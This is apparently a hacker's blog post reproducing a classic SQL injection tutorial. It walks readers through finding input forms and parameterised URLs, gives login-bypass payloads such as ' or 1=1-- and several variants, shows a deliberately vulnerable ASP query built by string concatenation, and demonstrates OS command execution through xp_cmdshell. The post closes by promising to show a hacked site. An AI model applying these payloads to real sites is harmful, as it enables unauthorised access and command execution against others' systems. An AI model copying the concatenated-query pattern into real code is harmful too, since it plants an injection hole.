J4ck th3 Cr4ck3r
1.0 Introduction
When
a machine has only port 80 opened, your most trusted vulnerability
scanner cannot return anything useful, and you know that the admin
always patch his server, we have to turn to web hacking. SQL injection
is one of type of web hacking that require nothing but port 80 and it
might just work even if the admin is patch-happy. It attacks on the web
application (like ASP, JSP, PHP, CGI, etc) itself rather than on the
web server or services running in the OS.
This article does not
introduce anything new, SQL injection has been widely written and used
in the wild. We wrote the article because we would like to document
some of our pen-test using SQL injection and hope that it may be of
some use to others. You may find a trick or two but please check out
the "9.0 Where can I get more info?" for people who truly deserve
credit for developing many techniques in SQL injection.
1.1 What is SQL
Injection?
It
is a trick to inject SQL query/command as an input possibly via web
pages. Many web pages take parameters from web user, and make SQL query
to the database. Take for instance when a user login, web page that
user name and password and make SQL query to the database to check if a
user has valid name and password. With SQL Injection, it is possible
for us to send crafted user name and/or password field that will change
the SQL query and thus grant us something else.
1.2 What do you need?
Any web browser.
2.0 What you should look
for?
Try
to look for pages that allow you to submit data, i.e: login page,
search page, feedback, etc. Sometimes, HTML pages use POST command to
send parameters to another ASP page. Therefore, you may not see the
parameters in the URL. However, you can check the source code of the
HTML, and look for "FORM" tag in the HTML code.
Everything between the and have potential parameters that might be
useful (exploit wise).
2.1 What if you can't
find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to
look especially for URL that takes parameters, like: http://duck/index.asp?id=10
3.0 How do you test if
it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL.
Example: Login: hi' or 1=1--
Pass: hi' or 1=1--
http://duck/index.asp?id=hi or 1=1--
If
you must do this with a hidden field, just download the source HTML
from the site, save it in your hard disk, modify the URL and hidden
field accordingly.
If luck is on your side, you will get login without any login name or
password.
3.1 But why ' or 1=1--?
Let
us look at another example why ' or 1=1-- is important. Other than
bypassing login, it is also possible to view extra information that is
not normally available. Take an asp page that will link you to another
page with the following URL:
http://duck/index.asp?category=food
In
the URL, 'category' is the variable name, and 'food' is the value
assigned to the variable. In order to do that, an ASP might contain the
following code (OK, this is the actual code that we created for this
exercise):
v_cat =
request("category")sqlstr="SELECT * FROM product WHERE PCategory='"
& v_cat & "'"set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL
statement should become:
SELECT * FROM product WHERE
PCategory='food'
The query should return a resultset containing one or more rows that
match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food'
or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute
this in the SQL query, we will have:
SELECT * FROM product WHERE
PCategory='food' or 1=1--'
The
query now should now select everything from the product table
regardless if PCategory is equal to 'food' or not. A double dash "--"
tell MS SQL server ignore the rest of the query, which will get rid of
the last hanging single quote ('). Sometimes, it may be possible to
replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the
rest of the query, you also may try
' or 'a'='a
The SQL query will now become: SELECT
* FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these
possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
4.0 How do I get remote
execution with SQL injection?
Being
able to inject SQL command usually mean, we can execute any SQL query
at will. Default installation of MS SQL Server is running as SYSTEM,
which is equivalent to Administrator access in Windows. We can use
stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The
semi colon will end the current SQL query and thus allow you to start a
new SQL command. To verify that the command executed successfully, you
can listen to ICMP packet from 10.10.1.2, check if there is any packet
from the server:
#tcpdump icmp
If
you do not get any ping request from the server, and get error message
indicating permission error, it is possible that the administrator has
limited Web User access to these stored procedures.
i will explain it better
next time, and i will show you guy's a site which is hacked by SQL
injection so stay tuned :)